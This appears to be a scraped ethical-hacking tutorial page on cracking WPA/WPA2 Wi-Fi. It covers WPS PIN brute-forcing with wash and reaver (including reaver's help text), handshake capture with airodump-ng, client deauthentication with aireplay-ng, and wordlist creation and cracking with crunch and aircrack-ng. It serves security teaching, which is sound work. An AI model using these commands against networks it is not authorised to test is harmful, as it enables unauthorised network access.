WPA Craking

  • WPA was designed to address the issues in WEP and provide better encryption.
  • The main issue in WEP is the short IV which means that they can be repeated, therefore by collecting a large number of IVs aircrakp-ng can determine the key stream and the WEP key.
  • In WPA each packet is encrypted with a unique temporary key, the means the number of data packets that we collect is irrelevant.
  • WPA and WPA2 are similar, the only difference is that WPA2 uses an algorithm called CCMP.

WPS Feature

WPS is a feature that allows users to connect to WPS enabled networks easily, using a WPS button or only by clicking on WPS functionality.

Authentication is done using an 8 digit long pin, this means that there is a relatively small number of pin combinations and using brute force we can guess the pin in less than 10 hours.

A tool called reaver can then recover the WPA/WPA key from the pin.

Note: This flaw is in the WPS feature and not in WPA/WPA2, however, it allows us to crack any WPA/WPA2 AP without using a wordlist and without any clients.

Use a tool called wash to scan for WPS enabled APs,

Use a tool called reaver to brute force the WPS ping and calculate the WPA key:

wash -i wlan0
airodump-ng wlan0
reaver -b :::: -c  -i wlan0
Reave --help

Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) , Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or / digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts []
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts []
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after unexpected failures []
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period []
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-/)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack Example:
reaver -i wlan0mon -b ::4C:C1:AC: -vv

Refer to:https://www.ethicalhackx.com/hack-wpawpa2-wps-reaver-kali-linux/

Theory behind the WPA_WPA2 craking

Capturing WPA packets is not useful as they do not contain any info that can be used to crack the key. The only packets that contain info that help us crack the password is the handshake packets. Every time a client connects to the AP a four way hand shake occurs between the client and teh AP.

By capturing the handshake, we can use aircrack to launch a word list attack against the handshake to determine the key.

To crack a WPA/WPA2 AP with WPS disabled we need two things:

1. Capture the handshake.
2. A wordlist

Craking WPA/WPA2 - Capturing the handshake

Handshake packets are sent every time a client associate with the target AP. So to capture it we are going to :

1. Start airodump-ng on the target AP:

airodump-ng --channel [channel] --bssid[bssid] --write [file-name] [interface]

2. Wait for a client to connect to the AP, or deauthenticate a connected client (if any) for a very short period of time so that their system will connect back automatically.

aireplay-ng --deauth [number of deauth packets] -a [AP] -c [target] [interface]

Notice top right corner of airodump-ng will say "WPA handshake".

Cracking WPA/WPA2 - Creating a Wordlist

The 2nd thing that we need to crack WPA/WPA2 is a list of passwords to guess, you can download a ready wordlist from the internet or create your own using a tool called crunch.

Resource -Some Links To Wordlists

ftp://ftp.openwall.com/pub/wordlists/
http://www.openwall.com/mirrors/
http://gdataonline.com/downloads/GDict/
http://www.outpost9.com/files/WordLists.html
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://wordlist.sourceforge.net/
./crunch [min] [max] [characters=lower/upper/numbers/symbols] -t [pattern] -o file

Cracking WPA/WPA2 - Cracking the Key

We are going to use aircrack-ng to crack the key. It does this by combining each password in the wordlist with AP name(essid) to compute a Pairwise Master Key(PMK) using the pbkdf2 algorithm, the PMK is the compared to the handshake file.

aircrack-ng [HANDSHAKE FILE] -w [WORDLIST] [INTERFACE]
E.G.,  aircrack-ng test-handshake-.cap -w sample-wordlist 

Ethical Hacking - NETWORK PENETRATION TESTING(10)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - Web Penetration Testing(10)

    SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(21)

    MITM - Code Injection Inject javascript or HTML code into pages. Code gets executed on target machin ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(20)

    MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: U ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(19)

    MITM-DNS Spoofing DNS Spoofing allows us to redirect any request to a certain domain to another doma ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(17)

    MITM - bypassing HTTPS Most websites use https in their login pages, this means that these pages are ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(16)

    ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf ...

随机推荐

  1. belongsTo和hasOne的区别

    简单的讲就是,没有太大的区别,只是在逻辑上出现的思想的偏差(逻辑的合理性).belongsTo:可以理解为属于hasOne:可以理解为拥有 首先,我们创建两张表.user表 字段 id name pa ...

  2. php配置文件

    mysql的配置文件是 my.iniphp配置文件是 php.iniThinKPHP配置文件 config.phpApche配置文件 httpd-confThinkPHP的运行,开启调试模式配置为 a ...

  3. docer

    docker默认是不保存文件的,包保存文件需要进行映射 dockerfile编写如下 直接下面的命令会失败 因为run后面的命令/bin/bash会失败,执行的是dockffile中定义的httpd ...

  4. -手写Spring注解版本&事务传播行为

    视频参考C:\Users\Administrator\Desktop\蚂蚁3期\[www.zxit8.com] 0018-(每特教育&每特学院&蚂蚁课堂)-3期-源码分析-手写Spri ...

  5. java异常处理之try_catch_finally

    java异常处理之try_catch_finally 看下面的一个列子: public class TestException { int goabl=1; public TestException( ...

  6. C# 9.0 终于来了, Top-level programs 和 Partial Methods 两大新特性探究

    一:背景 1. 讲故事 .NET 5 终于在 6月25日 发布了第六个预览版,随之而来的是更多的新特性加入到了 C# 9 Preview 中,这个系列也可以继续往下写了,废话不多说,今天来看一下 To ...

  7. CCNA-Part3 - 数据链路层的趣事 - 走进交换机

    在这篇文章中,会先介绍局域网及其的组件,通过交换机延伸到 TCP/IP 中数据链路层,了解数据的传输介质,以及交换机的发展历程及原理. 最后介绍数据帧的格式. 在阅读后应该了解如下的内容: 什么是局域 ...

  8. 入门大数据---基于Zookeeper搭建Spark高可用集群

    一.集群规划 这里搭建一个 3 节点的 Spark 集群,其中三台主机上均部署 Worker 服务.同时为了保证高可用,除了在 hadoop001 上部署主 Master 服务外,还在 hadoop0 ...

  9. 双缓冲显示字幕(卡拉ok字幕)

    思路: 1.设置定时器SetTime,在Ontime()里面确定显示矩形的大小,让后用DrawText把字铁道矩形上面: 2. int nTextHei = dc.GetTextExtent( m_s ...

  10. Spring 获取单例流程(二)

    读完这篇文章你将会收获到 Spring 中 prototype 类型的 bean 如何做循环依赖检测 Spring 中 singleton 类型的 bean 如何做循环依赖检测 前言 继上一篇文章 S ...